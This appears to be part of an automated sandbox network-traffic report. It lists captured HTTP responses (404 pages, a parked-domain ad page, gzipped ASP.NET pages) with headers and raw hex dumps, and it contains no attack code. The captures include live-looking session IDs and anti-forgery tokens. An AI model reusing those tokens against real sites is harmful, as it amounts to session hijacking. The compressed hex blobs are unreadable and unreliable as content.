                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 01 Dec 2023 22:09:33 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:37 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-137.ec2.internalX-Request-Id: 204abcb7-24fa-4ee4-8427-c1f2dca1d728Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:37 GMTContent-Type: text/htmlContent-Length: 867Connection: keep-aliveServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesExpires: Sat, 02 Dec 2023 01:09:41 GMTAge: 6Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:37 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sat, 02 Dec 2023 01:09:37 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/8.5Set-Cookie: ASP.NET_SessionId=j33ddbu2qqtzc0zpcqfcopfc; path=/; HttpOnly; SameSite=LaxX-AspNetMvc-Version: 5.2X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:28 GMTContent-Length: 6425Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d 4e f4 c0 b4 f3 7c 91 6f 4f 87 3b 45 7b d1 a6 69 53 4f 09 ea 6b fe a3 b9 bb a8 66 79 bd 2c 7e 50 ff 1e 97 9f 15 cb 93 9f 5c 9f 3e cb 3f fd ce fe 4f ec 3c 38 de 39 9e be 6a 26 df 29 a6 bf ff 57 a7 f7 bf b8 5a bd fa e2 c5 e7 d3 2f db b7 0f f7 df 9c ee 7e 44 06 48 00 2a 74 26 9e 52 4b ed d6 5d 46 ab b9 3b c9 9a fc ee b4 69 a8 8b df e7 fc f3 9d 7a 72 f2 13 eb 5f f4 ec 5e fd a4 99 bc 5d 4e 3e bd fc bd 0e 3e fd c1 f6 bb d9 2f 9a bf fa c1 ea dd f5 cb ea 41 f5 53 a7 b3 8a 6c 14 cf 45 d3 5e 97 79 33 cf f3 f6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/8.5Set-Cookie: ASP.NET_SessionId=k2sm0jx3poko3igmfawppd3r; path=/; HttpOnly; SameSite=LaxX-AspNetMvc-Version: 5.2X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:28 GMTContent-Length: 6425Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d 4e f4 c0 b4 f3 7c 91 6f 4f 87 3b 45 7b d1 a6 69 53 4f 09 ea 6b fe a3 b9 bb a8 66 79 bd 2c 7e 50 ff 1e 97 9f 15 cb 93 9f 5c 9f 3e cb 3f fd ce fe 4f ec 3c 38 de 39 9e be 6a 26 df 29 a6 bf ff 57 a7 f7 bf b8 5a bd fa e2 c5 e7 d3 2f db b7 0f f7 df 9c ee 7e 44 06 48 00 2a 74 26 9e 52 4b ed d6 5d 46 ab b9 3b c9 9a fc ee b4 69 a8 8b df e7 fc f3 9d 7a 72 f2 13 eb 5f f4 ec 5e fd a4 99 bc 5d 4e 3e bd fc bd 0e 3e fd c1 f6 bb d9 2f 9a bf fa c1 ea dd f5 cb ea 41 f5 53 a7 b3 8a 6c 14 cf 45 d3 5e 97 79 33 cf f3 f6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/8.5Set-Cookie: ASP.NET_SessionId=1m3pbchoknzanfqou5v0n44x; path=/; HttpOnly; SameSite=LaxX-AspNetMvc-Version: 5.2X-Frame-Options: SAMEORIGINX-AspNet-Version: 4.0.30319Set-Cookie: ASP.NET_SessionId=1m3pbchoknzanfqou5v0n44x; path=/; HttpOnly; SameSite=LaxSet-Cookie: __RequestVerificationToken=L4fpWIQFNsub_ozR1dLpTZAJEWIJbg0-lgoDkDO8Qi8CWGprPFppiqDMoPZXNqF4WckQK4Xpzk7D75Wvq450-nfzCBGxRAFFOm9JKEQ5MEM1; path=/; HttpOnlyX-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:28 GMTContent-Length: 6859Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"~7t.#?2[^|Q?<u{}Qz}g]il%5*fY~YLm#xkw] ph^miz@jajgOe_<>;{4}SFs/:k{e]|:Pz2kTox4zynYLbk;~EjYfuy\i}TD:?M?-Ev}M-?f8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/8.5Set-Cookie: ASP.NET_SessionId=setawluaocoer3ouv5bzrxfg; path=/; HttpOnly; SameSite=LaxX-AspNetMvc-Version: 5.2X-Frame-Options: SAMEORIGINX-AspNet-Version: 4.0.30319Set-Cookie: ASP.NET_SessionId=setawluaocoer3ouv5bzrxfg; path=/; HttpOnly; SameSite=LaxSet-Cookie: __RequestVerificationToken=9Tw4eBQMtJgww6r2d6xlIUkI77SdB-d_QbVeWe2xleWw9E4exyU-bCgcjVhGShYDr4w6sPQ_lWAp-mq26ZSEINgjwx9o2Wpwu8Yy7vq2iaI1; path=/; HttpOnlyX-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:28 GMTContent-Length: 6853Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 